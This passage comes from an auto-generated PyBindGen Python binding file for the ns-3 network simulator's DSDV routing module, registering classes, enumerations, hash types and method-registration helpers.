    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## socket.h (module 'network'): ns3::Socket [class]
    module.add_class('Socket', import_from_module='ns.network', parent=root_module['ns3::Object'])
    ## socket.h (module 'network'): ns3::Socket::SocketErrno [enumeration]
    module.add_enum('SocketErrno', ['ERROR_NOTERROR', 'ERROR_ISCONN', 'ERROR_NOTCONN', 'ERROR_MSGSIZE', 'ERROR_AGAIN', 'ERROR_SHUTDOWN', 'ERROR_OPNOTSUPP', 'ERROR_AFNOSUPPORT', 'ERROR_INVAL', 'ERROR_BADF', 'ERROR_NOROUTETOHOST', 'ERROR_NODEV', 'ERROR_ADDRNOTAVAIL', 'ERROR_ADDRINUSE', 'SOCKET_ERRNO_LAST'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network')
    ## socket.h (module 'network'): ns3::Socket::SocketType [enumeration]
    module.add_enum('SocketType', ['NS3_SOCK_STREAM', 'NS3_SOCK_SEQPACKET', 'NS3_SOCK_DGRAM', 'NS3_SOCK_RAW'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network')
    ## socket.h (module 'network'): ns3::SocketAddressTag [class]
    module.add_class('SocketAddressTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## socket.h (module 'network'): ns3::SocketIpTosTag [class]
    module.add_class('SocketIpTosTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## socket.h (module 'network'): ns3::SocketIpTtlTag [class]
    module.add_class('SocketIpTtlTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag [class]
    module.add_class('SocketIpv6HopLimitTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## socket.h (module 'network'): ns3::SocketIpv6TclassTag [class]
    module.add_class('SocketIpv6TclassTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## socket.h (module 'network'): ns3::SocketSetDontFragmentTag [class]
    module.add_class('SocketSetDontFragmentTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
    ## nstime.h (module 'core'): ns3::Time [class]
    module.add_class('Time', import_from_module='ns.core')
    ## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
    module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
    ## nstime.h (module 'core'): ns3::Time [class]
    root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
    ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
    module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
    ## trailer.h (module 'network'): ns3::Trailer [class]
    module.add_class('Trailer', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
    ## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable [class]
    module.add_class('TriangularRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable [class]
    module.add_class('UniformRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable [class]
    module.add_class('WeibullRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable [class]
    module.add_class('ZetaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable [class]
    module.add_class('ZipfRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## attribute.h (module 'core'): ns3::AttributeAccessor [class]
    module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
    ## attribute.h (module 'core'): ns3::AttributeChecker [class]
    module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
    ## attribute.h (module 'core'): ns3::AttributeValue [class]
    module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
    ## callback.h (module 'core'): ns3::CallbackChecker [class]
    module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## callback.h (module 'core'): ns3::CallbackImplBase [class]
    module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
    ## callback.h (module 'core'): ns3::CallbackValue [class]
    module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable [class]
    module.add_class('ConstantRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable [class]
    module.add_class('DeterministicRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable [class]
    module.add_class('EmpiricalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
    module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable [class]
    module.add_class('ErlangRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## event-impl.h (module 'core'): ns3::EventImpl [class]
    module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
    ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable [class]
    module.add_class('ExponentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable [class]
    module.add_class('GammaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol [class]
    module.add_class('IpL4Protocol', import_from_module='ns.internet', parent=root_module['ns3::Object'])
    ## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::RxStatus [enumeration]
    module.add_enum('RxStatus', ['RX_OK', 'RX_CSUM_FAILED', 'RX_ENDPOINT_CLOSED', 'RX_ENDPOINT_UNREACH'], outer_class=root_module['ns3::IpL4Protocol'], import_from_module='ns.internet')
    ## ipv4.h (module 'internet'): ns3::Ipv4 [class]
    module.add_class('Ipv4', import_from_module='ns.internet', parent=root_module['ns3::Object'])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class]
    module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class]
    module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## ipv4-interface.h (module 'internet'): ns3::Ipv4Interface [class]
    module.add_class('Ipv4Interface', import_from_module='ns.internet', parent=root_module['ns3::Object'])
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol [class]
    module.add_class('Ipv4L3Protocol', import_from_module='ns.internet', parent=root_module['ns3::Ipv4'])
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::DropReason [enumeration]
    module.add_enum('DropReason', ['DROP_TTL_EXPIRED', 'DROP_NO_ROUTE', 'DROP_BAD_CHECKSUM', 'DROP_INTERFACE_DOWN', 'DROP_ROUTE_ERROR', 'DROP_FRAGMENT_TIMEOUT'], outer_class=root_module['ns3::Ipv4L3Protocol'], import_from_module='ns.internet')
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class]
    module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class]
    module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute [class]
    module.add_class('Ipv4MulticastRoute', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >'])
    ## ipv4-route.h (module 'internet'): ns3::Ipv4Route [class]
    module.add_class('Ipv4Route', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >'])
    ## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol [class]
    module.add_class('Ipv4RoutingProtocol', import_from_module='ns.internet', parent=root_module['ns3::Object'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class]
    module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class]
    module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## ipv6-interface.h (module 'internet'): ns3::Ipv6Interface [class]
    module.add_class('Ipv6Interface', import_from_module='ns.internet', parent=root_module['ns3::Object'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class]
    module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class]
    module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable [class]
    module.add_class('LogNormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## net-device.h (module 'network'): ns3::NetDevice [class]
    module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object'])
    ## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration]
    module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network')
    ## nix-vector.h (module 'network'): ns3::NixVector [class]
    module.add_class('NixVector', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
    ## node.h (module 'network'): ns3::Node [class]
    module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object'])
    ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable [class]
    module.add_class('NormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class]
    module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class]
    module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper [class]
    module.add_class('OutputStreamWrapper', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
    ## packet.h (module 'network'): ns3::Packet [class]
    module.add_class('Packet', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
    ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable [class]
    module.add_class('ParetoRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## nstime.h (module 'core'): ns3::TimeValue [class]
    module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## type-id.h (module 'core'): ns3::TypeIdChecker [class]
    module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
    ## type-id.h (module 'core'): ns3::TypeIdValue [class]
    module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
    ## address.h (module 'network'): ns3::AddressChecker [class]
    module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
    ## address.h (module 'network'): ns3::AddressValue [class]
    module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
    ## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting [class]
    module.add_class('Ipv4ListRouting', import_from_module='ns.internet', parent=root_module['ns3::Ipv4RoutingProtocol'])
    module.add_container('std::map< unsigned int, unsigned int >', ('unsigned int', 'unsigned int'), container_type='map')
    ## Register a nested module for the namespace FatalImpl
    nested_module = module.add_cpp_namespace('FatalImpl')
    register_types_ns3_FatalImpl(nested_module)
    ## Register a nested module for the namespace Hash
    nested_module = module.add_cpp_namespace('Hash')
    register_types_ns3_Hash(nested_module)
    ## Register a nested module for the namespace dsdv
    nested_module = module.add_cpp_namespace('dsdv')
    register_types_ns3_dsdv(nested_module)
def register_types_ns3_FatalImpl(module):
    """Register wrapped types for the ns3::FatalImpl nested namespace.

    Auto-generated by PyBindGen.  No classes are registered here in this
    module's API scan; only the root-module handle is fetched (and unused).
    """
    root_module = module.get_root()
def register_types_ns3_Hash(module):
    """Register wrapped types for the ns3::Hash nested namespace.

    Auto-generated by PyBindGen.  Registers the Hash::Implementation base
    class, the hash-function-pointer type aliases, and recurses into the
    ns3::Hash::Function sub-namespace.
    """
    root_module = module.get_root()
    
    ## hash-function.h (module 'core'): ns3::Hash::Implementation [class]
    module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
    typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) *', 'ns3::Hash::Hash32Function_ptr')
    typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) **', 'ns3::Hash::Hash32Function_ptr*')
    typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) *&', 'ns3::Hash::Hash32Function_ptr&')
    typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) *', 'ns3::Hash::Hash64Function_ptr')
    typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) **', 'ns3::Hash::Hash64Function_ptr*')
    typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) *&', 'ns3::Hash::Hash64Function_ptr&')
    
    ## Register a nested module for the namespace Function
    
    nested_module = module.add_cpp_namespace('Function')
    register_types_ns3_Hash_Function(nested_module)
    
def register_types_ns3_Hash_Function(module):
    """Register wrapped types for the ns3::Hash::Function nested namespace.

    Auto-generated by PyBindGen.  Registers the concrete hash
    implementations (Fnv1a, Hash32, Hash64, Murmur3), all derived from
    ns3::Hash::Implementation.
    """
    root_module = module.get_root()
    
    ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class]
    module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class]
    module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class]
    module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class]
    module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
def register_types_ns3_dsdv(module):
    """Register wrapped types for the ns3::dsdv nested namespace.

    Auto-generated by PyBindGen.  Registers the DSDV routing protocol's
    enumeration, classes (header, packet queue, routing protocol and
    table), and the routing-table map container.
    """
    root_module = module.get_root()
    
    ## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RouteFlags [enumeration]
    module.add_enum('RouteFlags', ['VALID', 'INVALID'])
    ## dsdv-packet.h (module 'dsdv'): ns3::dsdv::DsdvHeader [class]
    module.add_class('DsdvHeader', parent=root_module['ns3::Header'])
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::PacketQueue [class]
    module.add_class('PacketQueue')
    ## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::QueueEntry [class]
    module.add_class('QueueEntry')
    ## dsdv-routing-protocol.h (module 'dsdv'): ns3::dsdv::RoutingProtocol [class]
    module.add_class('RoutingProtocol', parent=root_module['ns3::Ipv4RoutingProtocol'])
    ## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RoutingTable [class]
    module.add_class('RoutingTable')
    ## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RoutingTableEntry [class]
    module.add_class('RoutingTableEntry')
    module.add_container('std::map< ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry >', ('ns3::Ipv4Address', 'ns3::dsdv::RoutingTableEntry'), container_type='map')
def register_methods(root_module):
    """Register the methods of every wrapped class with *root_module*.

    Auto-generated by PyBindGen.  Each call delegates to a per-class
    ``register_Ns3*_methods`` helper, looked up by the class's fully
    qualified C++ name.  NOTE(review): the call order mirrors the order
    in which the types were registered — do not reorder by hand.
    """
    register_Ns3Address_methods(root_module, root_module['ns3::Address'])
    register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
    register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
    register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
    register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
    register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
    register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
    register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
    register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
    register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
    register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
    register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
    register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher'])
    register_Ns3Inet6SocketAddress_methods(root_module, root_module['ns3::Inet6SocketAddress'])
    register_Ns3InetSocketAddress_methods(root_module, root_module['ns3::InetSocketAddress'])
    register_Ns3IntToType__0_methods(root_module, root_module['ns3::IntToType< 0 >'])
    register_Ns3IntToType__1_methods(root_module, root_module['ns3::IntToType< 1 >'])
    register_Ns3IntToType__2_methods(root_module, root_module['ns3::IntToType< 2 >'])
    register_Ns3IntToType__3_methods(root_module, root_module['ns3::IntToType< 3 >'])
    register_Ns3IntToType__4_methods(root_module, root_module['ns3::IntToType< 4 >'])
    register_Ns3IntToType__5_methods(root_module, root_module['ns3::IntToType< 5 >'])
    register_Ns3IntToType__6_methods(root_module, root_module['ns3::IntToType< 6 >'])
    register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address'])
    register_Ns3Ipv4InterfaceAddress_methods(root_module, root_module['ns3::Ipv4InterfaceAddress'])
    register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask'])
    register_Ns3Ipv4RoutingHelper_methods(root_module, root_module['ns3::Ipv4RoutingHelper'])
    register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address'])
    register_Ns3Ipv6InterfaceAddress_methods(root_module, root_module['ns3::Ipv6InterfaceAddress'])
    register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix'])
    register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer'])
    register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
    register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
    register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory'])
    register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata'])
    register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item'])
    register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator'])
    register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator'])
    register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item'])
    register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList'])
    register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData'])
    register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
    register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator'])
    register_Ns3Tag_methods(root_module, root_module['ns3::Tag'])
    register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer'])
    register_Ns3Timer_methods(root_module, root_module['ns3::Timer'])
    register_Ns3TimerImpl_methods(root_module, root_module['ns3::TimerImpl'])
    register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
    register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
    register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
    register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
    register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
    register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk'])
    register_Ns3DsdvHelper_methods(root_module, root_module['ns3::DsdvHelper'])
    register_Ns3Header_methods(root_module, root_module['ns3::Header'])
    register_Ns3Ipv4Header_methods(root_module, root_module['ns3::Ipv4Header'])
    register_Ns3Ipv6Header_methods(root_module, root_module['ns3::Ipv6Header'])
    register_Ns3Object_methods(root_module, root_module['ns3::Object'])
    register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
    register_Ns3RandomVariableStream_methods(root_module, root_module['ns3::RandomVariableStream'])
    register_Ns3SequentialRandomVariable_methods(root_module, root_module['ns3::SequentialRandomVariable'])
    register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
    register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
    register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
    register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
    register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
    register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
    register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >'])
    register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >'])
    register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
    register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
    register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
    register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
    register_Ns3Socket_methods(root_module, root_module['ns3::Socket'])
    register_Ns3SocketAddressTag_methods(root_module, root_module['ns3::SocketAddressTag'])
    register_Ns3SocketIpTosTag_methods(root_module, root_module['ns3::SocketIpTosTag'])
    register_Ns3SocketIpTtlTag_methods(root_module, root_module['ns3::SocketIpTtlTag'])
    register_Ns3SocketIpv6HopLimitTag_methods(root_module, root_module['ns3::SocketIpv6HopLimitTag'])
    register_Ns3SocketIpv6TclassTag_methods(root_module, root_module['ns3::SocketIpv6TclassTag'])
    register_Ns3SocketSetDontFragmentTag_methods(root_module, root_module['ns3::SocketSetDontFragmentTag'])
    register_Ns3Time_methods(root_module, root_module['ns3::Time'])
    register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
    register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer'])
    register_Ns3TriangularRandomVariable_methods(root_module, root_module['ns3::TriangularRandomVariable'])
    register_Ns3UniformRandomVariable_methods(root_module, root_module['ns3::UniformRandomVariable'])
    register_Ns3WeibullRandomVariable_methods(root_module, root_module['ns3::WeibullRandomVariable'])
    register_Ns3ZetaRandomVariable_methods(root_module, root_module['ns3::ZetaRandomVariable'])
    register_Ns3ZipfRandomVariable_methods(root_module, root_module['ns3::ZipfRandomVariable'])
    register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
    register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
    register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
    register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
    register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
    register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
    register_Ns3ConstantRandomVariable_methods(root_module, root_module['ns3::ConstantRandomVariable'])
    register_Ns3DeterministicRandomVariable_methods(root_module, root_module['ns3::DeterministicRandomVariable'])
    register_Ns3EmpiricalRandomVariable_methods(root_module, root_module['ns3::EmpiricalRandomVariable'])
    register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
    register_Ns3ErlangRandomVariable_methods(root_module, root_module['ns3::ErlangRandomVariable'])
    register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl'])
    register_Ns3ExponentialRandomVariable_methods(root_module, root_module['ns3::ExponentialRandomVariable'])
    register_Ns3GammaRandomVariable_methods(root_module, root_module['ns3::GammaRandomVariable'])
    register_Ns3IpL4Protocol_methods(root_module, root_module['ns3::IpL4Protocol'])
    register_Ns3Ipv4_methods(root_module, root_module['ns3::Ipv4'])
    register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker'])
    register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue'])
    register_Ns3Ipv4Interface_methods(root_module, root_module['ns3::Ipv4Interface'])
    register_Ns3Ipv4L3Protocol_methods(root_module, root_module['ns3::Ipv4L3Protocol'])
